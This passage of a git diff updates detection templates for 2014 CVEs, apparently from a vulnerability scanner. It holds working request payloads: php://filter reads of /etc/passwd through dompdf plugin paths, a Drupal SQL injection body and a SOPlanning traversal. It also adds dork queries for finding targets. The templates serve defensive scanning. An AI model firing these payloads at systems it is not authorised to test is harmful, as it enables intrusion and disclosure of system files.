- - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
- - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
+ - "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
+ - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
- type: word
words:
- "application/pdf"
@@ -37,4 +51,4 @@ requests:
status:
- 200
-# Enhanced by mp on 2022/02/24
+# Enhanced by mp on 2022/08/06
diff --git a/cves/2014/CVE-2014-2908.yaml b/cves/2014/CVE-2014-2908.yaml
index 5c102a88a4..9322e79732 100644
--- a/cves/2014/CVE-2014-2908.yaml
+++ b/cves/2014/CVE-2014-2908.yaml
@@ -9,10 +9,11 @@ info:
- https://www.exploit-db.com/exploits/44687
- https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2014-2908
+ - http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02
+ remediation: Upgrade to v4.0 or later.
classification:
cve-id: CVE-2014-2908
- remediation: Upgrade to v4.0 or later.
- tags: cve,cve2014,xss,siemens
+ tags: cve,cve2014,xss,siemens,edb
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-2962.yaml b/cves/2014/CVE-2014-2962.yaml
index 9ce8d328b6..2c2c67d121 100644
--- a/cves/2014/CVE-2014-2962.yaml
+++ b/cves/2014/CVE-2014-2962.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.kb.cert.org/vuls/id/774788
- https://nvd.nist.gov/vuln/detail/CVE-2014-2962l
+ - http://www.kb.cert.org/vuls/id/774788
+ - http://www.belkin.com/us/support-article?articleNum=109400
+ remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
classification:
cve-id: CVE-2014-2962
- remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
tags: cve,cve2014,lfi,router,firmware,traversal
requests:
diff --git a/cves/2014/CVE-2014-3120.yaml b/cves/2014/CVE-2014-3120.yaml
index 3c3a345c84..66375d0aeb 100644
--- a/cves/2014/CVE-2014-3120.yaml
+++ b/cves/2014/CVE-2014-3120.yaml
@@ -10,9 +10,10 @@ info:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
- https://www.elastic.co/blog/logstash-1-4-3-released
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
+ - http://bouk.co/blog/elasticsearch-rce/
classification:
cve-id: CVE-2014-3120
- tags: cve,cve2014,elastic,rce,elasticsearch
+ tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic
requests:
- raw:
diff --git a/cves/2014/CVE-2014-3206.yaml b/cves/2014/CVE-2014-3206.yaml
index 956be1aeb7..64af96912b 100644
--- a/cves/2014/CVE-2014-3206.yaml
+++ b/cves/2014/CVE-2014-3206.yaml
@@ -8,12 +8,13 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-3206
- https://www.exploit-db.com/exploits/33159
+ - https://www.exploit-db.com/exploits/33159/
classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-3206
cwe-id: CWE-20
- tags: cve,cve2014,seagate,rce
+ tags: cve,cve2014,seagate,rce,edb
requests:
- raw:
diff --git a/cves/2014/CVE-2014-3704.yaml b/cves/2014/CVE-2014-3704.yaml
index caa96466e7..76fd15724b 100644
--- a/cves/2014/CVE-2014-3704.yaml
+++ b/cves/2014/CVE-2014-3704.yaml
@@ -9,32 +9,37 @@ info:
- https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql
- https://nvd.nist.gov/vuln/detail/CVE-2014-3704
- https://www.drupal.org/SA-CORE-2014-005
- - http://www.exploit-db.com/exploits/34984
- - http://www.exploit-db.com/exploits/34992
- - http://www.exploit-db.com/exploits/34993
- - http://www.exploit-db.com/exploits/35150
+ - https://www.exploit-db.com/exploits/34984
+ - https://www.exploit-db.com/exploits/34992
+ - https://www.exploit-db.com/exploits/34993
+ - https://www.exploit-db.com/exploits/35150
+ remediation: Upgrade to Drupal core 7.32 or later.
classification:
cve-id: CVE-2014-3704
- remediation: Upgrade to Drupal core 7.32 or later.
- tags: cve,cve2014,drupal,sqli
+ metadata:
+ shodan-query: http.component:"drupal"
+ tags: edb,cve,cve2014,drupal,sqli
+
+variables:
+ num: "999999999"
requests:
- method: POST
path:
- "{{BaseURL}}/?q=node&destination=node"
- body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a'
+ body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a'
matchers-condition: and
matchers:
+ - type: word
+ words:
+ - "PDOException"
+ - '{{md5({{num}})}}'
+ condition: and
+ part: body
+
- type: status
status:
- 500
- - type: word
- words:
- - "PDOException"
- - "e807f1fcf82d132f9bb018ca6738a19f"
- condition: and
- part: body
-
# Enhanced by mp on 2022/02/24
diff --git a/cves/2014/CVE-2014-3744.yaml b/cves/2014/CVE-2014-3744.yaml
index 7473ec1411..7ea04e9257 100644
--- a/cves/2014/CVE-2014-3744.yaml
+++ b/cves/2014/CVE-2014-3744.yaml
@@ -9,6 +9,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2014-3744
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
- https://snyk.io/vuln/npm:st:20140206
+ - https://nodesecurity.io/advisories/st_directory_traversal
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml
index 87845c7740..ced636d80d 100644
--- a/cves/2014/CVE-2014-4210.yaml
+++ b/cves/2014/CVE-2014-4210.yaml
@@ -1,7 +1,7 @@
id: CVE-2014-4210
info:
- name: Weblogic SSRF in SearchPublicRegistries.jsp
+ name: Oracle Weblogic - SSRF in SearchPublicRegistries.jsp
author: princechaddha
severity: medium
description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
@@ -9,6 +9,7 @@ info:
- https://www.oracle.com/security-alerts/cpujul2014.html
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
+ - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
classification:
cve-id: CVE-2014-4210
tags: cve,cve2014,weblogic,oracle,ssrf,oast
diff --git a/cves/2014/CVE-2014-4513.yaml b/cves/2014/CVE-2014-4513.yaml
index 416cf007fb..cda22cdb15 100644
--- a/cves/2014/CVE-2014-4513.yaml
+++ b/cves/2014/CVE-2014-4513.yaml
@@ -1,14 +1,17 @@
id: CVE-2014-4513
info:
- name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting
+ name: ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-4513
+ - http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss
classification:
cve-id: CVE-2014-4513
+ metadata:
+ google-query: inurl:"/wp-content/plugins/activehelper-livehelp"
tags: cve,cve2014,wordpress,xss,wp-plugin
requests:
diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml
index f5cc488e4e..292351960a 100644
--- a/cves/2014/CVE-2014-4535.yaml
+++ b/cves/2014/CVE-2014-4535.yaml
@@ -1,19 +1,20 @@
id: CVE-2014-4535
info:
- name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
+ name: Import Legacy Media <= 0.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
reference:
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
+ - http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4535
cwe-id: CWE-79
- tags: cve,cve2014,wordpress,wp-plugin,xss
+ tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml
index 0781e472a9..3bc8f45b92 100644
--- a/cves/2014/CVE-2014-4536.yaml
+++ b/cves/2014/CVE-2014-4536.yaml
@@ -1,19 +1,23 @@
id: CVE-2014-4536
info:
- name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
+ name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
reference:
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
+ - http://wordpress.org/plugins/infusionsoft/changelog
+ - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4536
cwe-id: CWE-79
- tags: cve,cve2014,wordpress,wp-plugin,xss
+ metadata:
+ google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
+ tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-4539.yaml b/cves/2014/CVE-2014-4539.yaml
index 6918732634..94b663a884 100644
--- a/cves/2014/CVE-2014-4539.yaml
+++ b/cves/2014/CVE-2014-4539.yaml
@@ -1,19 +1,20 @@
id: CVE-2014-4539
info:
- name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting
+ name: Movies <= 0.6 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
reference:
- https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
- https://nvd.nist.gov/vuln/detail/CVE-2014-4539
+ - http://codevigilant.com/disclosure/wp-plugin-movies-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4539
cwe-id: CWE-79
- tags: cve,cve2014,wordpress,wp-plugin,xss
+ tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-4544.yaml b/cves/2014/CVE-2014-4544.yaml
index d9ba1cbb7f..939d1ca226 100644
--- a/cves/2014/CVE-2014-4544.yaml
+++ b/cves/2014/CVE-2014-4544.yaml
@@ -1,19 +1,20 @@
id: CVE-2014-4544
info:
- name: Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting
+ name: Podcast Channels < 0.28 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
reference:
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544
+ - http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4544
cwe-id: CWE-79
- tags: cve,cve2014,wordpress,wp-plugin,xss
+ tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-4550.yaml b/cves/2014/CVE-2014-4550.yaml
index ea0eea4603..e9a6830b42 100644
--- a/cves/2014/CVE-2014-4550.yaml
+++ b/cves/2014/CVE-2014-4550.yaml
@@ -1,19 +1,22 @@
id: CVE-2014-4550
info:
- name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected Cross-Site Scripting
+ name: Shortcode Ninja <= 1.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.
reference:
- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
- https://nvd.nist.gov/vuln/detail/CVE-2014-4550
+ - http://codevigilant.com/disclosure/wp-plugin-shortcode-ninja-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4550
cwe-id: CWE-79
- tags: cve,cve2014,wordpress,wp-plugin,xss
+ metadata:
+ google-query: inurl:"/wp-content/plugins/shortcode-ninja"
+ tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-4558.yaml b/cves/2014/CVE-2014-4558.yaml
index db179433f6..1566035c02 100644
--- a/cves/2014/CVE-2014-4558.yaml
+++ b/cves/2014/CVE-2014-4558.yaml
@@ -1,19 +1,20 @@
id: CVE-2014-4558
info:
- name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting
+ name: WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
reference:
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
+ - http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4558
cwe-id: CWE-79
- tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce
+ tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-4561.yaml b/cves/2014/CVE-2014-4561.yaml
index 9308c5b025..878abafb7a 100644
--- a/cves/2014/CVE-2014-4561.yaml
+++ b/cves/2014/CVE-2014-4561.yaml
@@ -1,19 +1,20 @@
id: CVE-2014-4561
info:
- name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting
+ name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.
reference:
- https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
- https://nvd.nist.gov/vuln/detail/CVE-2014-4561
+ - http://codevigilant.com/disclosure/wp-plugin-ultimate-weather-plugin-a3-cross-site-scripting-xss/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4561
cwe-id: CWE-79
- tags: cve,cve2014,wordpress,wp-plugin,xss,weather
+ tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-4592.yaml b/cves/2014/CVE-2014-4592.yaml
index 75c8030033..35eb2a7082 100644
--- a/cves/2014/CVE-2014-4592.yaml
+++ b/cves/2014/CVE-2014-4592.yaml
@@ -1,19 +1,22 @@
id: CVE-2014-4592
info:
- name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
+ name: WP Planet <= 0.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
reference:
- https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
- https://nvd.nist.gov/vuln/detail/CVE-2014-4592
+ - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4592
cwe-id: CWE-79
- tags: cve,cve2014,wordpress,wp-plugin,xss
+ metadata:
+ google-query: inurl:"/wp-content/plugins/wp-planet"
+ tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-4940.yaml b/cves/2014/CVE-2014-4940.yaml
index 9fdac5089a..f485f7f869 100644
--- a/cves/2014/CVE-2014-4940.yaml
+++ b/cves/2014/CVE-2014-4940.yaml
@@ -7,8 +7,12 @@ info:
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-4940
+ - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail=
+ - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/
classification:
cve-id: CVE-2014-4940
+ metadata:
+ google-query: inurl:"/wp-content/plugins/tera-charts"
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
diff --git a/cves/2014/CVE-2014-4942.yaml b/cves/2014/CVE-2014-4942.yaml
new file mode 100644
index 0000000000..e1d2449c98
--- /dev/null
+++ b/cves/2014/CVE-2014-4942.yaml
@@ -0,0 +1,41 @@
+id: CVE-2014-4942
+
+info:
+ name: WP EasyCart - Information Disclosure
+ author: DhiyaneshDk
+ severity: low
+ description: |
+ The EasyCart (wp-easycart) plugin before 2.0.6 for WordPress allows remote attackers to obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.
+ reference:
+ - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150
+ - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4942
+ classification:
+ cve-id: CVE-2014-4942
+ tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "PHP Extension"
+ - "PHP Version"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '>PHP Version <\/td>([0-9.]+)'
diff --git a/cves/2014/CVE-2014-5111.yaml b/cves/2014/CVE-2014-5111.yaml
index 14bdc7cf05..66b9614ad2 100644
--- a/cves/2014/CVE-2014-5111.yaml
+++ b/cves/2014/CVE-2014-5111.yaml
@@ -8,9 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/39351
- https://nvd.nist.gov/vuln/detail/CVE-2014-5111
+ - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html
classification:
cve-id: CVE-2014-5111
- tags: cve,cve2014,lfi,trixbox
+ tags: packetstorm,cve,cve2014,lfi,trixbox,edb
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-5258.yaml b/cves/2014/CVE-2014-5258.yaml
index 3179b75dc8..e1fefd393a 100644
--- a/cves/2014/CVE-2014-5258.yaml
+++ b/cves/2014/CVE-2014-5258.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-5258
- https://www.exploit-db.com/exploits/34761
+ - http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html
+ - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0
classification:
cve-id: CVE-2014-5258
- tags: cve,cve2014,lfi
+ tags: edb,packetstorm,cve,cve2014,lfi
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-5368.yaml b/cves/2014/CVE-2014-5368.yaml
index c116159bd6..9c05358fa2 100644
--- a/cves/2014/CVE-2014-5368.yaml
+++ b/cves/2014/CVE-2014-5368.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-5368
- https://www.exploit-db.com/exploits/39287
- - https://www.cvedetails.com/cve/CVE-2014-5368
+ - http://seclists.org/oss-sec/2014/q3/417
classification:
cve-id: CVE-2014-5368
- tags: cve,cve2014,wordpress,wp-plugin,lfi
+ metadata:
+ google-query: inurl:"/wp-content/plugins/wp-source-control"
+ tags: cve,cve2014,wordpress,wp-plugin,lfi,edb,seclists
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml
index 6af4f83381..c7a2413d59 100644
--- a/cves/2014/CVE-2014-6271.yaml
+++ b/cves/2014/CVE-2014-6271.yaml
@@ -4,9 +4,7 @@ info:
name: ShellShock - Remote Code Execution
author: pentest_swissky,0xelkomy
severity: critical
- description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment,
- as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in
- which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.
+ description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-6271
- https://nvd.nist.gov/vuln/detail/CVE-2014-7169
@@ -17,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2014-6271
cwe-id: CWE-78
- tags: cve,cve2014,rce,shellshock
+ tags: cve,cve2014,rce,shellshock,kev
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-6308.yaml b/cves/2014/CVE-2014-6308.yaml
index 96a285cbc2..2664ce9906 100644
--- a/cves/2014/CVE-2014-6308.yaml
+++ b/cves/2014/CVE-2014-6308.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
- https://nvd.nist.gov/vuln/detail/CVE-2014-6308
+ - https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
+ - https://www.netsparker.com/lfi-vulnerability-in-osclass/
classification:
cve-id: CVE-2014-6308
- tags: cve,cve2014,lfi
+ tags: cve,cve2014,lfi,packetstorm
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-8676.yaml b/cves/2014/CVE-2014-8676.yaml
new file mode 100644
index 0000000000..67fadfeeb3
--- /dev/null
+++ b/cves/2014/CVE-2014-8676.yaml
@@ -0,0 +1,34 @@
+id: CVE-2014-8676
+
+info:
+ name: Simple Online Planning Tool 1.3.2 - Directory Traversal
+ author: 0x_Akoko
+ severity: medium
+ description: |
+ Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
+ reference:
+ - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-8676
+ - https://www.exploit-db.com/exploits/37604/
+ - http://seclists.org/fulldisclosure/2015/Jul/44
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2014-8676
+ cwe-id: CWE-22
+ tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2014/CVE-2014-8682.yaml b/cves/2014/CVE-2014-8682.yaml
index 604d129461..eecb69f728 100644
--- a/cves/2014/CVE-2014-8682.yaml
+++ b/cves/2014/CVE-2014-8682.yaml
@@ -3,23 +3,23 @@ id: CVE-2014-8682
info:
name: Gogs (Go Git Service) - SQL Injection
author: dhiyaneshDK,daffainfo
- severity: high
+ severity: critical
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8682
- http://seclists.org/fulldisclosure/2014/Nov/33
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
- - http://www.exploit-db.com/exploits/35238
+ - https://www.exploit-db.com/exploits/35238
- https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
+ cvss-score: 10
cve-id: CVE-2014-8682
cwe-id: CWE-89
metadata:
shodan-query: title:"Sign In - Gogs"
- tags: cve,cve2014,sqli,gogs
+ tags: gogs,seclists,packetstorm,edb,cve,cve2014,sqli
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-8799.yaml b/cves/2014/CVE-2014-8799.yaml
index 552634c3a9..68735c8d03 100644
--- a/cves/2014/CVE-2014-8799.yaml
+++ b/cves/2014/CVE-2014-8799.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8799
- https://www.exploit-db.com/exploits/35346
- - https://www.cvedetails.com/cve/CVE-2014-8799
+ - https://wordpress.org/plugins/dukapress/changelog/
classification:
cve-id: CVE-2014-8799
- tags: cve,cve2014,wordpress,wp-plugin,lfi
+ metadata:
+ google-query: inurl:"/wp-content/plugins/dukapress"
+ tags: cve,cve2014,wordpress,wp-plugin,lfi,edb
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml
index e792ca4df3..a28b8785e1 100644
--- a/cves/2014/CVE-2014-9094.yaml
